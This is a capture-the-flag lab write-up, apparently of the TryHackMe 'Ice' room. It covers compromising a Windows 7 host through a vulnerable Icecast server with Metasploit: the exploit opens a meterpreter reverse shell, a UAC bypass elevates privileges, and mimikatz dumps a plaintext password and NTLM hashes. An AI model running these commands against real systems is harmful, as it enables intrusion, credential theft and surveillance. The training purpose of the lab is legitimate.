Ice
Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
Kali Linux : 10.18.72.222
Target IP Address : 10.10.184.85
Recon
Scan and enumerate our victim!
Deploy the machine! This may take up to three minutes to start.
Launch a scan against our target machine, I recommend using a SYN scan set to scan all ports on the machine. The scan command will be provided as a hint, however, it’s recommended to complete the room ‘Nmap’ prior to this room.
To perform a SYN scan on all ports of a target machine using Nmap (a popular network scanning tool), you can use the following command:
1
nmap -sS -p- <target_ip>
Let me break down the command:
nmap: This is the command to execute Nmap.-sS: This option specifies a SYN scan, also known as a half-open scan. It sends SYN packets to the target ports to determine if they are open, closed, or filtered.-p-: This option tells Nmap to scan all 65535 TCP ports on the target machine. The dash (-) after-pmeans “all ports.”<target_ip>: Replace this with the IP address of the machine you want to scan. For example,10.10.19.228.
Yes, there are several ways to speed up the Nmap scan to make it more efficient and faster. Here are some tips to speed up the scan:
-
Adjust the Timing Template: Nmap provides different timing templates that control the speed and aggressiveness of the scan. The default template is usually “Normal” (
-T3). You can try using a faster timing template such as “Aggressive” (-T4) or “Insane” (-T5). Keep in mind that higher timing templates can be more aggressive and may increase the chances of being detected by intrusion detection systems (IDS) or firewalls.Example:
nmap -T4 -p- <target_ip> -
Specify Target Ports: Instead of scanning all 65535 TCP ports, you can focus on specific ports or a range of ports that are more likely to be open and interesting. This reduces the number of packets sent and shortens the scan time.
Example:
nmap -p 1-1000 <target_ip> -
Parallel Scanning: Nmap supports parallel scanning, which allows you to scan multiple hosts in parallel or multiple ports on a single host simultaneously. This can significantly speed up the scanning process.
Example for scanning multiple hosts:
nmap -T4 -F 192.168.1.100 192.168.1.101 192.168.1.102Example for scanning multiple ports in parallel:
nmap -p 22,80,443 -T4 <target_ip> -
Disable DNS Resolution: By default, Nmap performs DNS resolution to determine hostnames for scanned IP addresses. If you don’t need this information, you can disable DNS resolution to save time.
Example:
nmap -T4 -p- --max-rtt-timeout 200ms --max-retries 1 -n <target_ip> -
Use Version Detection and Script Scanning Selectively: Nmap can perform version detection and run various scripts to gather more information about the target. However, these features can take additional time. Use them selectively based on your specific goals.
Example for version detection:
nmap -sS -p- -sV <target_ip>Example for script scanning:
nmap -sS -p- -sC <target_ip>
Remember, while these techniques can speed up the scan, using aggressive scanning options might increase the chances of being detected and blocked by security systems. Always be mindful of the network you are scanning and ensure you have permission to conduct the scan on the target system. Unauthorized scanning is both unethical and illegal.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~]
└─# nmap 10.10.184.85
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 05:45 EDT
Nmap scan report for 10.10.184.85
Host is up (0.26s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8000/tcp open http-alt
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 71.00 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~]
└─# nmap -sV -p 135,139,445,3389,5357,8000 10.10.184.85
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 05:49 EDT
Nmap scan report for 10.10.184.85
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp open http Icecast streaming media server
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.69 seconds
Once the scan completes, we’ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?
3389
What service did nmap identify as running on port 8000? (First word of this service)
Icecast
What does Nmap identify as the hostname of the machine? (All caps for the answer)
DARK-PC
Gain Access
Exploit the target vulnerable service to gain a foothold!
Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.
Question Hint: This type of vulnerability allows for an attacker to execute arbitrary code in an unauthenticated fashion. The name can be found listed at the ‘Vulnerability Type’ on https://www.cvedetails.com
execute code overflow
What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000
CVE-2004-1561
Now that we’ve found our vulnerability, let’s find our exploit. For this section of the room, we’ll use the Metasploit module associated with this exploit. Let’s go ahead and start Metasploit using the command msfconsole
After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.
exploit/windows/http/icecast_header
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > search Icecast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
Let’s go ahead and select this module for use. Type either the command use icecast or use 0 to select our search result.
1
2
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Following selecting our module, we now have to check what options we have to set. Run the command show options. What is the only required setting which currently is blank?
RHOSTS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf6 exploit(windows/http/icecast_header) > show options
Module options (exploit/windows/http/icecast_header):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8000 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.117.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/icecast_header) > setg RHOSTS 10.10.184.85
RHOSTS => 10.10.184.85
msf6 exploit(windows/http/icecast_header) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
First let’s check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let’s set that last option to our target IP. Now that we have everything ready to go, let’s run our exploit using the command exploit
Escalate
Enumerate the machine and find potential privilege escalation paths to gain Admin powers!
Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now?
Meterpreter
1
2
3
4
5
6
7
msf6 exploit(windows/http/icecast_header) > exploit
[*] Started reverse TCP handler on 10.18.72.222:4444
[*] Sending stage (175686 bytes) to 10.10.184.85
[*] Meterpreter session 1 opened (10.18.72.222:4444 -> 10.10.184.85:49244) at 2023-07-29 06:41:13 -0400
meterpreter >
What user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.
Dark
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: Dark-PC\Dark
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
What build of Windows is the system?
7601
Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?
x64
Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the following command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.184.85 - Collecting local exploits for x86/windows...
[*] 10.10.184.85 - 186 exploit checks are being tried...
[+] 10.10.184.85 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.184.85 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.184.85 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.184.85 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
8 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
9 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
10 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
11 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
12 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
13 exploit/windows/local/always_install_elevated No The target is not exploitable.
14 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
15 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
16 exploit/windows/local/bthpan No The target is not exploitable.
17 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
18 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
19 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
20 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
21 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
22 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
23 exploit/windows/local/ikeext_service No The check raised an exception.
24 exploit/windows/local/ipass_launch_app No The check raised an exception.
25 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
26 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
27 exploit/windows/local/mqac_write No The target is not exploitable.
28 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?
exploit/windows/local/bypassuac_eventvwr
Now that we have an exploit in mind for elevating our privileges, let’s background our current session using the command background or CTRL + z. Take note of what session number we have, this will likely be 1 in this case. We can list all of our active sessions using the command sessions when outside of the meterpreter shell.
1
2
3
4
5
6
7
8
9
10
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/http/icecast_header) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows Dark-PC\Dark @ DARK-PC 10.18.72.222:4444 -> 10.10.184.85:49244 (10.10.184.85)
Go ahead and select our previously found local exploit for use using the command use FULL_PATH_FOR_EXPLOIT
Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
Windows 升级 UAC 保护绕过(通过 Eventvwr 注册表项)
此模块将通过劫持当前用户配置单元下的注册表中的特殊密钥并插入将在启动 Windows 事件查看器时调用的自定义命令来绕过 Windows UAC。它将生成第二个关闭 UAC 标志的外壳。此模块修改注册表项,但在调用有效负载后清理该注册表项。该模块不需要有效负载的架构来匹配操作系统。如果指定 EXE::自定义,则 DLL 应在单独的进程中启动有效负载后调用 ExitProcess()。
1
2
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Local exploits require a session to be selected (something we can verify with the command show options), set this now using the command set session SESSION_NUMBER
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf6 exploit(windows/local/bypassuac_eventvwr) > show options
Module options (exploit/windows/local/bypassuac_eventvwr):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.117.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(windows/local/bypassuac_eventvwr) > set LPORT 4433
LPORT => 4433
Now that we’ve set our session number, further options will be revealed in the options menu. We’ll have to set one more as our listener IP isn’t correct. What is the name of this option?
LHOST
Set this option now. You might have to check your IP on the TryHackMe network using the command ip addr
After we’ve set this last option, we can now run our privilege escalation exploit. Run this now using the command run. Note, this might take a few attempts and you may need to relaunch the box and exploit the service in the case that this fails.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf6 exploit(windows/local/bypassuac_eventvwr) > exploit
[*] Started reverse TCP handler on 10.18.72.222:4433
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.184.85
[*] Meterpreter session 2 opened (10.18.72.222:4433 -> 10.10.184.85:49277) at 2023-07-29 07:11:38 -0400
[*] Cleaning up registry keys ...
meterpreter >
Following completion of the privilege escalation a new session will be opened. Interact with it now using the command sessions SESSION_NUMBER
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows Dark-PC\Dark @ DARK-PC 10.18.72.222:4444 -> 10.10.184.85:49244 (10.10.184.85)
2 meterpreter x86/windows Dark-PC\Dark @ DARK-PC 10.18.72.222:4433 -> 10.10.184.85:49277 (10.10.184.85)
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions 2
[*] Starting interaction with 2...
meterpreter >
We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?
SeTakeOwnershipPrivilege
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: Dark-PC\Dark
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
The SeTakeOwnershipPrivilege is a security privilege in the Windows operating system that determines whether a user or process can take ownership of objects, such as files and directories, that they do not currently own. This privilege is one of several security settings that control user rights and permissions in Windows.
Taking ownership of an object grants the user or process the full control permissions on that object. With this privilege, a user or process can change permissions, modify or delete the object, and perform various administrative tasks.
Typically, administrators and certain privileged system processes have this privilege enabled by default. It allows them to perform essential tasks, such as modifying system files or accessing sensitive resources. Standard users, on the other hand, usually do not have this privilege to prevent unauthorized changes to critical system components.
Having the SeTakeOwnershipPrivilege can be potentially dangerous, as it can lead to unauthorized access and modification of sensitive data if misused. Therefore, it is essential to restrict this privilege to trusted and authorized users or processes.
It is worth noting that proper access control and permission management are crucial for maintaining the security of a Windows system. Users and administrators should exercise caution when granting or modifying security privileges to prevent security breaches and maintain the integrity of the system.
Looting
Learn how to gather additional credentials and crack the saved hashes on the machine.
Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let’s list the processes using the command ps. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn’t).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
508 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
820 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
888 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
936 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1064 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1196 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1304 100 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1320 1292 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1380 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1408 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1448 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1568 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1576 820 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1660 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1696 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1844 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
2060 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2256 1320 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2280 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2456 2236 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2476 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2660 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2668 820 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe
2728 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2796 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2868 820 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
2904 2868 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it’ll restart if we crash it! What’s the name of the printer service?
spoolsv.exe
Mentioned within this question is the term ‘living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.
Migrate to this process now with the command migrate -N PROCESS_NAME
1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2456 to 1380...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Let’s check what user we are now with the command getuid. What user is listed?
NT AUTHORITY\SYSTEM
Now that we’ve made our way to full administrator permissions we’ll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command load kiwi (Kiwi is the updated version of Mimikatz)
1
2
3
4
5
6
7
8
9
10
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
Loading kiwi into our meterpreter session will expand our help menu, take a look at the newly added section of the help menu now via the command help.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
meterpreter > help kiwi
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerber Retrieve Kerberos creds (parsed)
os
creds_livess Retrieve Live SSP creds
p
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdiges Retrieve WDigest creds (parsed)
t
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticke Create a golden kerberos ticket
t_create
kerberos_tic List all kerberos tickets (unparsed)
ket_list
kerberos_tic Purge any in-use kerberos tickets
ket_purge
kerberos_tic Use a kerberos ticket
ket_use
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_sec Dump LSA secrets (unparsed)
rets
password_cha Change the password/hash of a user
nge
wifi_list List wifi profiles/creds for the current user
wifi_list_sh List shared wifi profiles/creds (requires SYSTEM)
ared
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
命令 描述
------- -----------
creds_all 检索所有凭证(解析后)
creds_kerber 检索Kerberos凭证(解析后)
os
creds_livess 检索Live SSP凭证
p
creds_msv 检索LM/NTLM凭证(解析后)
creds_ssp 检索SSP凭证
creds_tspkg 检索TsPkg凭证(解析后)
creds_wdiges 检索WDigest凭证(解析后)
t
dcsync 通过DCSync检索用户账户信息(未解析)
dcsync_ntlm 通过DCSync检索用户账户NTLM散列、SID和RID
golden_ticke 创建一个黄金Kerberos票据
t_create
kerberos_tic 列出所有Kerberos票据(未解析)
ket_list
kerberos_tic 清除正在使用中的Kerberos票据
ket_purge
kerberos_tic 使用Kerberos票据
ket_use
kiwi_cmd 执行任意Mimikatz命令(未解析)
lsa_dump_sam 转储LSA SAM(未解析)
lsa_dump_sec 转储LSA secrets(未解析)
rets
password_cha 更改用户的密码/哈希
nge
wifi_list 列出当前用户的wifi配置文件/凭证
wifi_list_sh 列出共享的wifi配置文件/凭证(需要SYSTEM权限)
ared
Which command allows up to retrieve all credentials?
creds_all
Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in as there is a scheduled task that runs the Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take a look again at the ps list, this box isn’t in the best shape with both the firewall and defender disabled)
Password01!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
Post-Exploitation
Explore post-exploitation actions we can take on Windows.
Before we start our post-exploitation, let’s revisit the help menu one last time in the meterpreter shell. We’ll answer the following questions using that menu.
What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)
hashdump
1
2
3
4
5
6
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?
screenshare
1
2
3
4
5
Stdapi: User interface Commands
===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
How about if we wanted to record from a microphone attached to the system?
record_mic
1
2
3
4
5
6
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.
timestomp
1
2
3
4
5
6
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
Mimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.
golden_ticket_create
